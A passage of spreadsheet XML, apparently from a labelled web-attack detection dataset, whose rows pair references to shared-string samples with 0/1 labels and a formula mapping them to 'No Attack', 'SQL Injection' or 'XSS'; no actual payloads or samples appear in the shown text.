      </c>
    </row>
    <row r="34815" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34815" s="1" t="s">
        <v>28863</v>
      </c>
      <c r="B34815">
        <v>0</v>
      </c>
      <c r="C34815" s="7" t="str">
        <f t="shared" si="543"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34816" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34816" s="1" t="s">
        <v>37245</v>
      </c>
      <c r="B34816">
        <v>0</v>
      </c>
      <c r="C34816" s="7" t="str">
        <f t="shared" si="543"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34817" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34817" s="1" t="s">
        <v>35903</v>
      </c>
      <c r="B34817">
        <v>0</v>
      </c>
      <c r="C34817" s="7" t="str">
        <f t="shared" si="543"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34818" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34818" s="1" t="s">
        <v>33054</v>
      </c>
      <c r="B34818">
        <v>0</v>
      </c>
      <c r="C34818" s="7" t="str">
        <f t="shared" si="543"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34819" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34819" s="1" t="s">
        <v>32668</v>
      </c>
      <c r="B34819">
        <v>0</v>
      </c>
      <c r="C34819" s="7" t="str">
        <f t="shared" ref="C34819:C34882" si="544">IF(B34819=0,"No Attack", IF(B34819=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34820" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34820" s="1" t="s">
        <v>29188</v>
      </c>
      <c r="B34820">
        <v>0</v>
      </c>
      <c r="C34820" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34821" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34821" s="1" t="s">
        <v>29964</v>
      </c>
      <c r="B34821">
        <v>0</v>
      </c>
      <c r="C34821" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34822" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34822" s="1" t="s">
        <v>21910</v>
      </c>
      <c r="B34822">
        <v>0</v>
      </c>
      <c r="C34822" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34823" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34823" s="1" t="s">
        <v>33667</v>
      </c>
      <c r="B34823">
        <v>0</v>
      </c>
      <c r="C34823" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34824" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34824" s="1" t="s">
        <v>20082</v>
      </c>
      <c r="B34824">
        <v>0</v>
      </c>
      <c r="C34824" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34825" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34825" s="1" t="s">
        <v>23749</v>
      </c>
      <c r="B34825">
        <v>0</v>
      </c>
      <c r="C34825" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34826" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34826" s="1" t="s">
        <v>28814</v>
      </c>
      <c r="B34826">
        <v>0</v>
      </c>
      <c r="C34826" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34827" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34827" s="1" t="s">
        <v>20576</v>
      </c>
      <c r="B34827">
        <v>0</v>
      </c>
      <c r="C34827" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34828" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34828" s="1" t="s">
        <v>32360</v>
      </c>
      <c r="B34828">
        <v>0</v>
      </c>
      <c r="C34828" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34829" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34829" s="1" t="s">
        <v>32817</v>
      </c>
      <c r="B34829">
        <v>0</v>
      </c>
      <c r="C34829" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34830" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34830" s="1" t="s">
        <v>29040</v>
      </c>
      <c r="B34830">
        <v>0</v>
      </c>
      <c r="C34830" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34831" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34831" s="1" t="s">
        <v>30125</v>
      </c>
      <c r="B34831">
        <v>0</v>
      </c>
      <c r="C34831" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34832" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34832" s="1" t="s">
        <v>33037</v>
      </c>
      <c r="B34832">
        <v>0</v>
      </c>
      <c r="C34832" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34833" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34833" s="1" t="s">
        <v>32355</v>
      </c>
      <c r="B34833">
        <v>0</v>
      </c>
      <c r="C34833" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34834" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34834" s="1" t="s">
        <v>29114</v>
      </c>
      <c r="B34834">
        <v>0</v>
      </c>
      <c r="C34834" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34835" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34835" s="1" t="s">
        <v>37406</v>
      </c>
      <c r="B34835">
        <v>0</v>
      </c>
      <c r="C34835" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34836" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34836" s="1" t="s">
        <v>29431</v>
      </c>
      <c r="B34836">
        <v>0</v>
      </c>
      <c r="C34836" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34837" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34837" s="1" t="s">
        <v>29527</v>
      </c>
      <c r="B34837">
        <v>0</v>
      </c>
      <c r="C34837" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34838" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34838" s="1" t="s">
        <v>27003</v>
      </c>
      <c r="B34838">
        <v>0</v>
      </c>
      <c r="C34838" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34839" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34839" s="1" t="s">
        <v>29298</v>
      </c>
      <c r="B34839">
        <v>0</v>
      </c>
      <c r="C34839" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34840" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34840" s="1" t="s">
        <v>33690</v>
      </c>
      <c r="B34840">
        <v>0</v>
      </c>
      <c r="C34840" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34841" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34841" s="1" t="s">
        <v>30993</v>
      </c>
      <c r="B34841">
        <v>0</v>
      </c>
      <c r="C34841" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34842" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34842" s="1" t="s">
        <v>29325</v>
      </c>
      <c r="B34842">
        <v>0</v>
      </c>
      <c r="C34842" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34843" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34843" s="1" t="s">
        <v>21018</v>
      </c>
      <c r="B34843">
        <v>0</v>
      </c>
      <c r="C34843" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34844" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34844" s="1" t="s">
        <v>23012</v>
      </c>
      <c r="B34844">
        <v>0</v>
      </c>
      <c r="C34844" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34845" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34845" s="1" t="s">
        <v>21721</v>
      </c>
      <c r="B34845">
        <v>0</v>
      </c>
      <c r="C34845" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34846" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34846" s="1" t="s">
        <v>32508</v>
      </c>
      <c r="B34846">
        <v>0</v>
      </c>
      <c r="C34846" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34847" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34847" s="1" t="s">
        <v>31057</v>
      </c>
      <c r="B34847">
        <v>0</v>
      </c>
      <c r="C34847" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34848" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34848" s="1" t="s">
        <v>32849</v>
      </c>
      <c r="B34848">
        <v>0</v>
      </c>
      <c r="C34848" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34849" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34849" s="1" t="s">
        <v>11228</v>
      </c>
      <c r="B34849">
        <v>1</v>
      </c>
      <c r="C34849" s="7" t="str">
        <f t="shared" si="544"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="34850" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34850" s="1" t="s">
        <v>10577</v>
      </c>
      <c r="B34850">
        <v>0</v>
      </c>
      <c r="C34850" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34851" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34851" s="1" t="s">
        <v>10578</v>
      </c>
      <c r="B34851">
        <v>0</v>
      </c>
      <c r="C34851" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34852" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34852" s="1" t="s">
        <v>11229</v>
      </c>
      <c r="B34852">
        <v>1</v>
      </c>
      <c r="C34852" s="7" t="str">
        <f t="shared" si="544"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="34853" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34853" s="1" t="s">
        <v>21221</v>
      </c>
      <c r="B34853">
        <v>0</v>
      </c>
      <c r="C34853" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34854" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34854" s="1" t="s">
        <v>27087</v>
      </c>
      <c r="B34854">
        <v>0</v>
      </c>
      <c r="C34854" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34855" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34855" s="1" t="s">
        <v>22175</v>
      </c>
      <c r="B34855">
        <v>0</v>
      </c>
      <c r="C34855" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34856" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34856" s="1" t="s">
        <v>27181</v>
      </c>
      <c r="B34856">
        <v>0</v>
      </c>
      <c r="C34856" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34857" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34857" s="1" t="s">
        <v>36673</v>
      </c>
      <c r="B34857">
        <v>0</v>
      </c>
      <c r="C34857" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34858" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34858" s="1" t="s">
        <v>11234</v>
      </c>
      <c r="B34858">
        <v>1</v>
      </c>
      <c r="C34858" s="7" t="str">
        <f t="shared" si="544"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="34859" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34859" s="1" t="s">
        <v>30204</v>
      </c>
      <c r="B34859">
        <v>0</v>
      </c>
      <c r="C34859" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34860" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34860" s="1" t="s">
        <v>27790</v>
      </c>
      <c r="B34860">
        <v>0</v>
      </c>
      <c r="C34860" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34861" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34861" s="1" t="s">
        <v>27615</v>
      </c>
      <c r="B34861">
        <v>0</v>
      </c>
      <c r="C34861" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34862" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34862" s="1" t="s">
        <v>31837</v>
      </c>
      <c r="B34862">
        <v>0</v>
      </c>
      <c r="C34862" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34863" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34863" s="1" t="s">
        <v>22625</v>
      </c>
      <c r="B34863">
        <v>0</v>
      </c>
      <c r="C34863" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34864" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34864" s="1" t="s">
        <v>22197</v>
      </c>
      <c r="B34864">
        <v>0</v>
      </c>
      <c r="C34864" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34865" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34865" s="1" t="s">
        <v>34903</v>
      </c>
      <c r="B34865">
        <v>0</v>
      </c>
      <c r="C34865" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34866" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34866" s="1" t="s">
        <v>35298</v>
      </c>
      <c r="B34866">
        <v>0</v>
      </c>
      <c r="C34866" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34867" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34867" s="1" t="s">
        <v>23192</v>
      </c>
      <c r="B34867">
        <v>0</v>
      </c>
      <c r="C34867" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34868" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34868" s="1" t="s">
        <v>24213</v>
      </c>
      <c r="B34868">
        <v>0</v>
      </c>
      <c r="C34868" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34869" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34869" s="1" t="s">
        <v>23547</v>
      </c>
      <c r="B34869">
        <v>0</v>
      </c>
      <c r="C34869" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34870" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34870" s="1" t="s">
        <v>31050</v>
      </c>
      <c r="B34870">
        <v>0</v>
      </c>
      <c r="C34870" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34871" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34871" s="1" t="s">
        <v>29882</v>
      </c>
      <c r="B34871">
        <v>0</v>
      </c>
      <c r="C34871" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34872" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34872" s="1" t="s">
        <v>29880</v>
      </c>
      <c r="B34872">
        <v>0</v>
      </c>
      <c r="C34872" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34873" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34873" s="1" t="s">
        <v>20303</v>
      </c>
      <c r="B34873">
        <v>0</v>
      </c>
      <c r="C34873" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34874" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34874" s="1" t="s">
        <v>33126</v>
      </c>
      <c r="B34874">
        <v>0</v>
      </c>
      <c r="C34874" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34875" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34875" s="1" t="s">
        <v>31807</v>
      </c>
      <c r="B34875">
        <v>0</v>
      </c>
      <c r="C34875" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34876" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34876" s="1" t="s">
        <v>20997</v>
      </c>
      <c r="B34876">
        <v>0</v>
      </c>
      <c r="C34876" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34877" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34877" s="1" t="s">
        <v>36443</v>
      </c>
      <c r="B34877">
        <v>0</v>
      </c>
      <c r="C34877" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34878" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34878" s="1" t="s">
        <v>29402</v>
      </c>
      <c r="B34878">
        <v>0</v>
      </c>
      <c r="C34878" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34879" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34879" s="1" t="s">
        <v>31249</v>
      </c>
      <c r="B34879">
        <v>0</v>
      </c>
      <c r="C34879" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34880" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34880" s="1" t="s">
        <v>34252</v>
      </c>
      <c r="B34880">
        <v>0</v>
      </c>
      <c r="C34880" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34881" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34881" s="1" t="s">
        <v>31007</v>
      </c>
      <c r="B34881">
        <v>0</v>
      </c>
      <c r="C34881" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34882" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34882" s="1" t="s">
        <v>20896</v>
      </c>
      <c r="B34882">
        <v>0</v>
      </c>
      <c r="C34882" s="7" t="str">
        <f t="shared" si="544"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34883" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34883" s="1" t="s">
        <v>9936</v>
      </c>
      <c r="B34883">
        <v>0</v>
      </c>
      <c r="C34883" s="7" t="str">
        <f t="shared" ref="C34883:C34946" si="545">IF(B34883=0,"No Attack", IF(B34883=1, "SQL Injection", "XSS") )</f>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34884" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34884" s="1" t="s">
        <v>27820</v>
      </c>
      <c r="B34884">
        <v>0</v>
      </c>
      <c r="C34884" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34885" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34885" s="1" t="s">
        <v>22840</v>
      </c>
      <c r="B34885">
        <v>0</v>
      </c>
      <c r="C34885" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34886" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34886" s="1" t="s">
        <v>20558</v>
      </c>
      <c r="B34886">
        <v>0</v>
      </c>
      <c r="C34886" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34887" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34887" s="1" t="s">
        <v>35372</v>
      </c>
      <c r="B34887">
        <v>0</v>
      </c>
      <c r="C34887" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34888" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34888" s="1" t="s">
        <v>35468</v>
      </c>
      <c r="B34888">
        <v>0</v>
      </c>
      <c r="C34888" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34889" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34889" s="1" t="s">
        <v>29627</v>
      </c>
      <c r="B34889">
        <v>0</v>
      </c>
      <c r="C34889" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34890" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34890" s="1" t="s">
        <v>28372</v>
      </c>
      <c r="B34890">
        <v>0</v>
      </c>
      <c r="C34890" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34891" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34891" s="1" t="s">
        <v>26943</v>
      </c>
      <c r="B34891">
        <v>0</v>
      </c>
      <c r="C34891" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34892" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34892" s="1" t="s">
        <v>20648</v>
      </c>
      <c r="B34892">
        <v>0</v>
      </c>
      <c r="C34892" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34893" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34893" s="1" t="s">
        <v>29053</v>
      </c>
      <c r="B34893">
        <v>0</v>
      </c>
      <c r="C34893" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34894" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34894" s="1" t="s">
        <v>35368</v>
      </c>
      <c r="B34894">
        <v>0</v>
      </c>
      <c r="C34894" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34895" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34895" s="1" t="s">
        <v>34238</v>
      </c>
      <c r="B34895">
        <v>0</v>
      </c>
      <c r="C34895" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34896" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34896" s="1" t="s">
        <v>32931</v>
      </c>
      <c r="B34896">
        <v>0</v>
      </c>
      <c r="C34896" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34897" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34897" s="1" t="s">
        <v>28626</v>
      </c>
      <c r="B34897">
        <v>0</v>
      </c>
      <c r="C34897" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34898" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34898" s="1" t="s">
        <v>29736</v>
      </c>
      <c r="B34898">
        <v>0</v>
      </c>
      <c r="C34898" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34899" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34899" s="1" t="s">
        <v>34100</v>
      </c>
      <c r="B34899">
        <v>0</v>
      </c>
      <c r="C34899" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34900" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34900" s="1" t="s">
        <v>30797</v>
      </c>
      <c r="B34900">
        <v>0</v>
      </c>
      <c r="C34900" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34901" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34901" s="1" t="s">
        <v>29346</v>
      </c>
      <c r="B34901">
        <v>0</v>
      </c>
      <c r="C34901" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34902" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34902" s="1" t="s">
        <v>31740</v>
      </c>
      <c r="B34902">
        <v>0</v>
      </c>
      <c r="C34902" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34903" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34903" s="1" t="s">
        <v>20523</v>
      </c>
      <c r="B34903">
        <v>0</v>
      </c>
      <c r="C34903" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34904" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34904" s="1" t="s">
        <v>29924</v>
      </c>
      <c r="B34904">
        <v>0</v>
      </c>
      <c r="C34904" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34905" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34905" s="1" t="s">
        <v>27114</v>
      </c>
      <c r="B34905">
        <v>0</v>
      </c>
      <c r="C34905" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34906" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34906" s="1" t="s">
        <v>22207</v>
      </c>
      <c r="B34906">
        <v>0</v>
      </c>
      <c r="C34906" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34907" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34907" s="1" t="s">
        <v>35848</v>
      </c>
      <c r="B34907">
        <v>0</v>
      </c>
      <c r="C34907" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34908" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34908" s="1" t="s">
        <v>21019</v>
      </c>
      <c r="B34908">
        <v>0</v>
      </c>
      <c r="C34908" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34909" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34909" s="1" t="s">
        <v>28463</v>
      </c>
      <c r="B34909">
        <v>0</v>
      </c>
      <c r="C34909" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34910" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34910" s="1" t="s">
        <v>24151</v>
      </c>
      <c r="B34910">
        <v>0</v>
      </c>
      <c r="C34910" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34911" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34911" s="1" t="s">
        <v>34507</v>
      </c>
      <c r="B34911">
        <v>0</v>
      </c>
      <c r="C34911" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34912" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34912" s="1" t="s">
        <v>30070</v>
      </c>
      <c r="B34912">
        <v>0</v>
      </c>
      <c r="C34912" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34913" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34913" s="1" t="s">
        <v>30324</v>
      </c>
      <c r="B34913">
        <v>0</v>
      </c>
      <c r="C34913" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34914" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34914" s="1" t="s">
        <v>30551</v>
      </c>
      <c r="B34914">
        <v>0</v>
      </c>
      <c r="C34914" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34915" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34915" s="1" t="s">
        <v>34764</v>
      </c>
      <c r="B34915">
        <v>0</v>
      </c>
      <c r="C34915" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34916" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34916" s="1" t="s">
        <v>29632</v>
      </c>
      <c r="B34916">
        <v>0</v>
      </c>
      <c r="C34916" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34917" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34917" s="1" t="s">
        <v>32308</v>
      </c>
      <c r="B34917">
        <v>0</v>
      </c>
      <c r="C34917" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="34918" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A34918" s="1" t="s">
        <v>27006</v>
      </c>
      <c r="B34918">
        <v>0</v>
      </c>
      <c r="C34918" s="7" t="str">
        <f t="shared" si="545"/>
        <v>No Attack</v>
      </c>
    </row>
